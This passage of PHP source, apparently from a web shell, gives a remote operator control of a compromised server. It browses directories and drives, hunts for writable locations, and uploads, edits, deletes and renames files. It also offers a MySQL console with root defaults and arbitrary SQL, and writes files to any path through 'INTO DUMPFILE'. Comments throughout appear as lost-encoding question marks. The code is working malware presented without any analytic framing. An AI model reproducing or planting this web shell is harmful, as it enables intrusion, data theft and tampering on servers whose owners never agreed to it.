1018		for($i=0;$i<$n-1;$i++) {
1019
1020		$cwd_links .= '<a href="javascript:godir(\'';
1021
1022		for($j=0;$j<=$i;$j++) {
1023
1024		$cwd_links .= $path[$j].'/';
1025
1026		}
1027
1028		$cwd_links .= '\');">'.$path[$i].'/</a>';
1029
1030		}
1031
1032
1033
1034		?>
1035
1036		<script type="text/javascript">
1037
1038		document.onclick = shownav;
1039
1040		function shownav(e){
1041
1042		var src = e?e.target:event.srcElement;
1043
1044		do{
1045
1046		if(src.id =="jumpto") {
1047
1048		$('inputnav').style.display = "";
1049
1050		$('pathnav').style.display = "none";
1051
1052		//hidenav();
1053
1054		return;
1055
1056		}
1057
1058		if(src.id =="inputnav") {
1059
1060		return;
1061
1062		}
1063
1064		src = src.parentNode;
1065
1066		}while(src.parentNode)
1067
1068
1069
1070		$('inputnav').style.display = "none";
1071
1072		$('pathnav').style.display = "";
1073
1074		}
1075
1076		</script>
1077
1078		<div style="background:#eee;margin-bottom:10px;">
1079
1080		<table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
1081
1082		<tr>
1083
1084		<td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
1085
1086		<td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
1087
1088		</tr>
1089
1090		</table>
1091
1092		<table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
1093
1094		<form action="" method="post" id="godir" name="godir">
1095
1096		<tr>
1097
1098		<td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
1099
1100		<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
1101
1102		<td nowrap><input class="bt" value="GO" type="submit"></td>
1103
1104		</tr>
1105
1106		</form>
1107
1108		</table>
1109
1110		<?php
1111
1112		if (IS_WIN && IS_COM) {
1113
1114		$obj = new COM('scripting.filesystemobject');
1115
1116		if ($obj && is_object($obj) && $obj->Drives) {
1117
1118		echo '<div class="drives">';
1119
1120		$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
1121
1122		$comma = '';
1123
1124		foreach($obj->Drives as $drive) {
1125
1126		if ($drive->Path) {
1127
1128		p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
1129
1130		$comma = '<span>\|</span>';
1131
1132		}
1133
1134		}
1135
1136		echo '</div>';
1137
1138		}
1139
1140		}
1141
1142		?>
1143
1144		</div>
1145
1146		<?php
1147
1148		$findstr = $_POST['findstr'];
1149
1150		$re = $_POST['re'];
1151
1152		tbhead();
1153
1154		p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
1155
1156		p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
1157
1158		p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
1159
1160		p(' \| <a href="javascript:godir(\'.\');">ScriptPath</a>');
1161
1162		p(' \| <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
1163
1164		p(' \| View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
1165
1166		p(' \| <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
1167
1168		p(' \| <a href="javascript:createdir();">Create Directory</a> \| <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
1169
1170
1171
1172		p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
1173
1174
1175
1176		p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
1177
1178
1179
1180		//???????????
1181
1182		$dirdata=array();
1183
1184		$filedata=array();
1185
1186
1187
1188		if ($view_writable == 'dir') {
1189
1190		$dirdata = GetWDirList($nowpath);
1191
1192		$filedata = array();
1193
1194		} elseif ($view_writable == 'file') {
1195
1196		$dirdata = array();
1197
1198		$filedata = GetWFileList($nowpath);
1199
1200		} elseif ($findstr) {
1201
1202		$dirdata = array();
1203
1204		$filedata = GetSFileList($nowpath, $findstr, $re);
1205
1206		} else {
1207
1208		// ????
1209
1210		//scandir()????
1211
1212		$dirs=@opendir($dir);
1213
1214		while ($file=@readdir($dirs)) {
1215
1216		$filepath=$nowpath.$file;
1217
1218		if(@is_dir($filepath)){
1219
1220		$dirdb['filename']=$file;
1221
1222		$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
1223
1224		$dirdb['dirchmod']=getChmod($filepath);
1225
1226		$dirdb['dirperm']=getPerms($filepath);
1227
1228		$dirdb['fileowner']=getUser($filepath);
1229
1230		$dirdb['dirlink']=$nowpath;
1231
1232		$dirdb['server_link']=$filepath;
1233
1234		$dirdata[]=$dirdb;
1235
1236		} else {
1237
1238		$filedb['filename']=$file;
1239
1240		$filedb['size']=sizecount(@filesize($filepath));
1241
1242		$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
1243
1244		$filedb['filechmod']=getChmod($filepath);
1245
1246		$filedb['fileperm']=getPerms($filepath);
1247
1248		$filedb['fileowner']=getUser($filepath);
1249
1250		$filedb['dirlink']=$nowpath;
1251
1252		$filedb['server_link']=$filepath;
1253
1254		$filedata[]=$filedb;
1255
1256		}
1257
1258		}// while
1259
1260		unset($dirdb);
1261
1262		unset($filedb);
1263
1264		@closedir($dirs);
1265
1266		}
1267
1268		@sort($dirdata);
1269
1270		@sort($filedata);
1271
1272		$dir_i = '0';
1273
1274
1275
1276		p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
1277
1278		makehide('action','file');
1279
1280		makehide('thefile');
1281
1282		makehide('doing');
1283
1284		makehide('dir',$nowpath);
1285
1286
1287
1288		foreach($dirdata as $key => $dirdb){
1289
1290		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
1291
1292		if($getdir && $getdir == $dirdb['server_link']) {
1293
1294		$attachsize = dirsize($dirdb['server_link']);
1295
1296		$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
1297
1298		} else {
1299
1300		$attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
1301
1302		}
1303
1304		$thisbg = bg();
1305
1306		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1307
1308		p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
1309
1310		p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
1311
1312		p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
1313
1314		p('<td nowrap>'.$attachsize.'</td>');
1315
1316		p('<td nowrap>');
1317
1318		p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
1319
1320		p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
1321
1322		p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
1323
1324		p('</tr>');
1325
1326		$dir_i++;
1327
1328		} else {
1329
1330		if($dirdb['filename']=='..') {
1331
1332		p('<tr class='.bg().'>');
1333
1334		p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
1335
1336		p('</tr>');
1337
1338		}
1339
1340		}
1341
1342		}
1343
1344
1345
1346		p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
1347
1348		$file_i = '0';
1349
1350
1351
1352		foreach($filedata as $key => $filedb){
1353
1354		if($filedb['filename']!='..' && $filedb['filename']!='.') {
1355
1356		$fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
1357
1358		$thisbg = bg();
1359
1360		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1361
1362		p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
1363
1364		p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
1365
1366		p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
1367
1368		p('<td nowrap>'.$filedb['size'].'</td>');
1369
1370		p('<td nowrap>');
1371
1372		p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
1373
1374		p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
1375
1376		p('<td nowrap>');
1377
1378		p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> \| ');
1379
1380		p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> \| ');
1381
1382		p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> \| ');
1383
1384		p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
1385
1386		p('</td></tr>');
1387
1388		$file_i++;
1389
1390		}
1391
1392		}
1393
1394		p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
1395
1396		p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
1397
1398		p('</form></table>');
1399
1400		}// end dir
1401
1402
1403
1404		elseif ($action == 'sqlfile') {
1405
1406		if($doing=="mysqlupload"){
1407
1408		$file = $_FILES['uploadfile'];
1409
1410		$filename = $file['tmp_name'];
1411
1412		if (file_exists($savepath)) {
1413
1414		m('The goal file has already existed');
1415
1416		} else {
1417
1418		if(!$filename) {
1419
1420		m('Please choose a file');
1421
1422		} else {
1423
1424		$fp=@fopen($filename,'r');
1425
1426		$contents=@fread($fp, filesize($filename));
1427
1428		@fclose($fp);
1429
1430		$contents = bin2hex($contents);
1431
1432		if(!$upname) $upname = $file['name'];
1433
1434		$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1435
1436		$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
1437
1438		m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
1439
1440		}
1441
1442		}
1443
1444		}
1445
1446		?>
1447
1448		<script type="text/javascript">
1449
1450		function mysqlfile(doing){
1451
1452		if(!doing) return;
1453
1454		$('doing').value=doing;
1455
1456		$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
1457
1458		$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
1459
1460		$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
1461
1462		$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
1463
1464		$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
1465
1466		$('mysqlfile').charset.value=$('dbinfo').charset.value;
1467
1468		$('mysqlfile').submit();
1469
1470		}
1471
1472		</script>
1473
1474		<?php
1475
1476		!$dbhost && $dbhost = 'localhost';
1477
1478		!$dbuser && $dbuser = 'root';
1479
1480		!$dbport && $dbport = '3306';
1481
1482		formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
1483
1484		makehide('action','sqlfile');
1485
1486		p('<p>');
1487
1488		p('DBHost:');
1489
1490		makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
1491
1492		p(':');
1493
1494		makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
1495
1496		p('DBUser:');
1497
1498		makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
1499
1500		p('DBPass:');
1501
1502		makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
1503
1504		p('DBName:');
1505
1506		makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
1507
1508		p('DBCharset:');
1509
1510		makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
1511
1512		p('</p>');
1513
1514		formfoot();
1515
1516		p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
1517
1518		p('<h2>Upload file</h2>');
1519
1520		p('<p><b>This operation the DB user must has FILE privilege</b></p>');
1521
1522		p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
1523
1524		p('<h2>Download file</h2>');
1525
1526		p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
1527
1528		makehide('dbhost');
1529
1530		makehide('dbport');
1531
1532		makehide('dbuser');
1533
1534		makehide('dbpass');
1535
1536		makehide('dbname');
1537
1538		makehide('charset');
1539
1540		makehide('doing');
1541
1542		makehide('action','sqlfile');
1543
1544		p('</form>');
1545
1546		}
1547
1548
1549
1550		elseif ($action == 'mysqladmin') {
1551
1552		!$dbhost && $dbhost = 'localhost';
1553
1554		!$dbuser && $dbuser = 'root';
1555
1556		!$dbport && $dbport = '3306';
1557
1558		$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
1559
1560		if(isset($dbhost)){
1561
1562		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
1563
1564		}
1565
1566		if(isset($dbuser)) {
1567
1568		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
1569
1570		}
1571
1572		if(isset($dbpass)) {
1573
1574		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
1575
1576		}
1577
1578		if(isset($dbport)) {
1579
1580		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
1581
1582		}
1583
1584		if(isset($dbname)) {
1585
1586		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
1587
1588		}
1589
1590		if(isset($charset)) {
1591
1592		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
1593
1594		}
1595
1596
1597
1598		if ($doing == 'backupmysql' && $saveasfile) {
1599
1600		if (!$table) {
1601
1602		m('Please choose the table');
1603
1604		} else {
1605
1606		$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1607
1608		$fp = @fopen($path,'w');
1609
1610		if ($fp) {
1611
1612		foreach($table as $k => $v) {
1613
1614		if ($v) {
1615
1616		sqldumptable($v, $fp);
1617
1618		}
1619
1620		}
1621
1622		fclose($fp);
1623
1624		$fileurl = str_replace(SA_ROOT,'',$path);
1625
1626		m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
1627
1628		mysql_close();
1629
1630		} else {
1631
1632		m('Backup failed');
1633
1634		}
1635
1636		}
1637
1638		}
1639
1640		if ($insert && $insertsql) {
1641
1642		$keystr = $valstr = $tmp = '';
1643
1644		foreach($insertsql as $key => $val) {
1645
1646		if ($val) {
1647
1648		$keystr .= $tmp.$key;
1649
1650		$valstr .= $tmp."'".addslashes($val)."'";
1651
1652		$tmp = ',';
1653
1654		}
1655
1656		}
1657
1658		if ($keystr && $valstr) {
1659
1660		$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1661
1662		m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
1663
1664		}
1665
1666		}
1667
1668		if ($update && $insertsql && $base64) {
1669
1670		$valstr = $tmp = '';
1671
1672		foreach($insertsql as $key => $val) {
1673
1674		$valstr .= $tmp.$key."='".addslashes($val)."'";
1675
1676		$tmp = ',';
1677
1678		}
1679
1680		if ($valstr) {
1681
1682		$where = base64_decode($base64);
1683
1684		$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1685
1686		m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
1687
1688		}
1689
1690		}
1691
1692		if ($doing == 'del' && $base64) {
1693
1694		$where = base64_decode($base64);
1695
1696		$delete_sql = "DELETE FROM $tablename WHERE $where";
1697
1698		$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1699
1700		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
1701
1702		}
1703
1704
1705
1706		if ($tablename && $doing == 'drop') {
1707
1708		$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1709
1710		if (q("DROP TABLE $tablename")) {
1711
1712		m('Drop table of success');
1713
1714		$tablename = '';
1715
1716		} else {
1717
1718		m(mysql_error());
1719
1720		}
1721
1722		}
1723
1724
1725
1726		formhead(array('title'=>'MYSQL Manager'));
1727
1728		makehide('action','mysqladmin');
1729
1730		p('<p>');
1731
1732		p('DBHost:');
1733
1734		makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
1735
1736		p(':');
1737
1738		makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
1739
1740		p('DBUser:');
1741
1742		makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
1743
1744		p('DBPass:');
1745
1746		makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
1747
1748		p('DBCharset:');
1749
1750		makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
1751
1752		makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
1753
1754		p('</p>');
1755
1756		formfoot();
1757
1758
1759
1760		//????
1761
1762		formhead(array('name'=>'recordlist'));
1763
1764		makehide('doing');
1765
1766		makehide('action','mysqladmin');
1767
1768		makehide('base64');
1769
1770		makehide('tablename');
1771
1772		p($dbform);
1773
1774		formfoot();
1775
1776
1777
1778		//?????
1779
1780		formhead(array('name'=>'setdbname'));
1781
1782		makehide('action','mysqladmin');
1783
1784		p($dbform);
1785
1786		if (!$dbname) {
1787
1788		makehide('dbname');
1789
1790		}
1791
1792		formfoot();
1793
1794
1795
1796		//???
1797
1798		formhead(array('name'=>'settable'));
1799
1800		makehide('action','mysqladmin');
1801
1802		p($dbform);
1803
1804		makehide('tablename');
1805
1806		makehide('page',$page);
1807
1808		makehide('doing');
1809
1810		formfoot();
1811
1812
1813
1814		$cachetables = array();
1815
1816		$pagenum = 30;
1817
1818		$page = intval($page);
1819
1820		if($page) {
1821
1822		$start_limit = ($page - 1) * $pagenum;
1823
1824		} else {
1825
1826		$start_limit = 0;
1827
1828		$page = 1;
1829
1830		}
1831
1832		if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
1833
1834		$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
1835
1836		//???????
1837
1838		$mysqlver = mysql_get_server_info();
1839
1840		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
1841
1842		$highver = $mysqlver > '4.1' ? 1 : 0;
1843
1844
1845
1846		//?????
1847
1848		$query = q("SHOW DATABASES");
1849
1850		$dbs = array();
1851
1852		$dbs[] = '-- Select a database --';
1853
1854		while($db = mysql_fetch_array($query)) {
1855
1856		$dbs[$db['Database']] = $db['Database'];
1857
1858		}
1859
1860		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
1861
1862		$tabledb = array();
1863
1864		if ($dbname) {
1865
1866		p('<p>');
1867
1868		p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
1869
1870		if ($tablename) {
1871
1872		p(' \| Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> \| <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> \| <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
1873
1874		}
1875
1876		p('</p>');
1877
1878		mysql_select_db($dbname);
1879
1880
1881
1882		$getnumsql = '';
1883
1884		$runquery = 0;
1885
1886		if ($sql_query) {
1887
1888		$runquery = 1;
1889
1890		}
1891
1892		$allowedit = 0;
1893
1894		if ($tablename && !$sql_query) {
1895
1896		$sql_query = "SELECT * FROM $tablename";
1897
1898		$getnumsql = $sql_query;
1899
1900		$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
1901
1902		$allowedit = 1;
1903
1904		}
1905
1906		p('<form action="'.$self.'" method="POST">');
1907
1908		p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
1909
1910		makehide('tablename', $tablename);
1911
1912		makehide('action','mysqladmin');
1913
1914		p($dbform);
1915
1916		p('</form>');
1917
1918		if ($tablename \|\| ($runquery && $sql_query)) {
1919
1920		if ($doing == 'structure') {
1921
1922		$result = q("SHOW FULL COLUMNS FROM $tablename");
1923
1924		$rowdb = array();
1925
1926		while($row = mysql_fetch_array($result)) {
1927
1928		$rowdb[] = $row;
1929
1930		}
1931
1932		p('<h3>Structure</h3>');
1933
1934		p('<table border="0" cellpadding="3" cellspacing="0">');
1935
1936		p('<tr class="head">');
1937
1938		p('<td>Field</td>');
1939
1940		p('<td>Type</td>');
1941
1942		p('<td>Collation</td>');
1943
1944		p('<td>Null</td>');
1945
1946		p('<td>Key</td>');
1947
1948		p('<td>Default</td>');
1949
1950		p('<td>Extra</td>');
1951
1952		p('<td>Privileges</td>');
1953
1954		p('<td>Comment</td>');
1955
1956		p('</tr>');
1957
1958		foreach ($rowdb as $row) {
1959
1960		$thisbg = bg();
1961
1962		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1963
1964		p('<td>'.$row['Field'].'</td>');
1965
1966		p('<td>'.$row['Type'].'</td>');
1967
1968		p('<td>'.$row['Collation'].' </td>');
1969
1970		p('<td>'.$row['Null'].' </td>');
1971
1972		p('<td>'.$row['Key'].' </td>');
1973
1974		p('<td>'.$row['Default'].' </td>');
1975
1976		p('<td>'.$row['Extra'].' </td>');
1977
1978		p('<td>'.$row['Privileges'].' </td>');
1979
1980		p('<td>'.$row['Comment'].' </td>');
1981
1982		p('</tr>');
1983
1984		}
1985
1986		tbfoot();
1987
1988		$result = q("SHOW INDEX FROM $tablename");
1989
1990		$rowdb = array();
1991
1992		while($row = mysql_fetch_array($result)) {
1993
1994		$rowdb[] = $row;
1995
1996		}
1997
1998		p('<h3>Indexes</h3>');
1999
2000		p('<table border="0" cellpadding="3" cellspacing="0">');
2001
2002		p('<tr class="head">');
2003
2004		p('<td>Keyname</td>');
2005
2006		p('<td>Type</td>');
2007
2008		p('<td>Unique</td>');
2009
2010		p('<td>Packed</td>');
2011
2012		p('<td>Seq_in_index</td>');
2013
2014		p('<td>Field</td>');
2015
2016		p('<td>Cardinality</td>');
2017
2018		p('<td>Collation</td>');
2019
2020		p('<td>Null</td>');
2021
2022		p('<td>Comment</td>');
2023
2024		p('</tr>');
2025
2026		foreach ($rowdb as $row) {
2027
2028		$thisbg = bg();
2029
2030		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
2031
2032		p('<td>'.$row['Key_name'].'</td>');
2033
2034		p('<td>'.$row['Index_type'].'</td>');
2035
2036		p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').' </td>');
2037
2038		p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).' </td>');
2039
2040		p('<td>'.$row['Seq_in_index'].'</td>');
2041
2042		p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').' </td>');
2043
2044		p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).' </td>');
2045
2046		p('<td>'.$row['Collation'].' </td>');
2047
2048		p('<td>'.$row['Null'].' </td>');
2049
2050		p('<td>'.$row['Comment'].' </td>');
2051
2052		p('</tr>');
2053
2054		}
2055
2056		tbfoot();
2057
2058		} elseif ($doing == 'insert' \|\| $doing == 'edit') {
2059
2060		$result = q('SHOW COLUMNS FROM '.$tablename);
2061
2062		while ($row = mysql_fetch_array($result)) {
2063
2064		$rowdb[] = $row;
2065
2066		}
2067
2068		$rs = array();
2069
2070		if ($doing == 'insert') {
2071
2072		p('<h2>Insert new line in '.$tablename.' table »</h2>');
2073
2074		} else {
2075
2076		p('<h2>Update record in '.$tablename.' table »</h2>');
2077
2078		$where = base64_decode($base64);
2079
2080		$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
2081
2082		$rs = mysql_fetch_array($result);
2083
2084		}
2085
2086		p('<form method="post" action="'.$self.'">');
2087
2088		p($dbform);
2089
2090		makehide('action','mysqladmin');
2091
2092		makehide('tablename',$tablename);
2093
2094		p('<table border="0" cellpadding="3" cellspacing="0">');
2095
2096		foreach ($rowdb as $row) {
2097
2098		if ($rs[$row['Field']]) {
2099
2100		$value = htmlspecialchars($rs[$row['Field']]);
2101
2102		} else {
2103
2104		$value = '';
2105
2106		}
2107
2108		$thisbg = bg();
2109
2110		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
2111
2112		if ($row['Key'] == 'UNI' \|\| $row['Extra'] == 'auto_increment' \|\| $row['Key'] == 'PRI') {
2113
2114		p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.' </td></tr>');
2115
2116		} else {
2117
2118		p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
2119
2120		}
2121
2122		}
2123
2124		if ($doing == 'insert') {
2125
2126		p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
2127
2128		} else {
2129
2130		p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
2131
2132		makehide('base64', $base64);
2133
2134		}
2135
2136		p('</table></form>');
2137
2138		} else {
2139
2140		$querys = @explode(';',$sql_query);
2141
2142		foreach($querys as $num=>$query) {
2143
2144		if ($query) {
2145
2146		p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
2147
2148		switch(qy($query))
2149
2150		{
2151
2152		case 0:
2153
2154		p('<h2>Error : '.mysql_error().'</h2>');
2155
2156		break;
2157
2158		case 1:
2159
2160		if (strtolower(substr($query,0,13)) == 'select * from') {
2161
2162		$allowedit = 1;
2163
2164		}
2165
2166		if ($getnumsql) {
2167
2168		$tatol = mysql_num_rows(q($getnumsql));
2169
2170		$multipage = multi($tatol, $pagenum, $page, $tablename);
2171
2172		}
2173
2174		if (!$tablename) {
2175
2176		$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
2177
2178		$sql_line = preg_replace("/\/\[^(\\/)]\\//i", " ", $sql_line);
2179
2180		preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
2181
2182		$tablename = $matches[1][0];
2183
2184		}
2185
2186
2187
2188		/*********************/
2189
2190		$getfield = q("SHOW COLUMNS FROM $tablename");
2191
2192		$rowdb = array();
2193
2194		$keyfied = ''; //????
2195
2196		while($row = @mysql_fetch_assoc($getfield)) {
2197
2198		$rowdb[$row['Field']]['Key'] = $row['Key'];
2199
2200		$rowdb[$row['Field']]['Extra'] = $row['Extra'];
2201
2202		if ($row['Key'] == 'UNI' \|\| $row['Key'] == 'PRI') {
2203
2204		$keyfied = $row['Field'];
2205
2206		}
2207
2208		}
2209
2210		/*********************/
2211
2212		//?????????????
2213
